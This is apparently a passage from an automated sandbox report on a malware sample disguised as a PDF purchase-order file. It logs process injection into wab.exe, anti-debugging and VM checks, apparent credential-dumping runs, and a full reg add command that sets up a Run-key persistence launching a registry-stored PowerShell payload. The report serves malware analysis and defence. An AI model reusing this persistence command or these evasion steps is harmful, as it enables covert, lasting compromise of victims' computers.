              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 701A6A1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5826Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3952Jump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw96B9.tmp\nsDialogs.dllJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5500Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5004Thread sleep count: 44 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_00406435 FindFirstFileA,FindClose,0_2_00406435
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_00405889 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405889
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_23DC10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC6580 FindFirstFileExA,9_2_23DC6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Vandskellenes\Tramp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Vandskellenes\Jump to behavior
              Source: wab.exe, 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs
              Source: wab.exe, 00000009.00000002.3519866024.000000000836A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-3450
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-3615
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_14-34115
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_050177F9 LdrInitializeThunk,2_2_050177F9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_23DC2639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC4AB4 mov eax, dword ptr fs:[00000030h]9_2_23DC4AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC724E GetProcessHeap,9_2_23DC724E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_23DC2B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_23DC2639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_23DC60E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3FC0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 78FDC8Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vcrnmdjhacaz"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fwegnvuioksemqa"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iykqoofccsljowohdo"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%risikofriestes% -windowstyle minimized $follikler=(get-itemproperty -path 'hkcu:\reattach237\').kkkenredskab;%risikofriestes% ($follikler)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%risikofriestes% -windowstyle minimized $follikler=(get-itemproperty -path 'hkcu:\reattach237\').kkkenredskab;%risikofriestes% ($follikler)"Jump to behavior
              Source: wab.exe, 00000009.00000002.3519866024.00000000083E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3228612298.00000000083E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3227599996.00000000083E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managervider
              Source: wab.exe, 00000009.00000002.3519866024.00000000083E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3228612298.00000000083E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3227599996.00000000083E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerH
              Source: wab.exe, 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-n
              Source: wab.exe, 00000009.00000002.3519866024.00000000083E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000009.00000002.3519866024.00000000083E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerA
              Source: wab.exe, 00000009.00000002.3519866024.00000000083E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerb
              Source: wab.exe, 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerIw
              Source: wab.exe, 00000009.00000002.3519866024.00000000083E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 00000009.00000002.3519866024.00000000083E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerI
              Source: wab.exe, 00000009.00000003.3199547013.00000000083DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3198636650.00000000083D3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3519866024.00000000083E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerw
              Source: wab.exe, 00000009.00000003.3199547013.00000000083DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3198636650.00000000083D3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3519866024.00000000083E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6
              Source: wab.exe, 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerSnhu
              Source: wab.exe, 00000009.00000002.3519866024.00000000083E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3228612298.00000000083E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3227599996.00000000083E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager]
              Source: wab.exe, 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000009.00000003.3199547013.00000000083DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3198636650.00000000083D3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3198675731.00000000083E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager[
              Source: wab.exe, 00000009.00000002.3519866024.000000000836A000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.drBinary or memory string: [Program Manager]
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC2933 cpuid 9_2_23DC2933
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_23DC2264
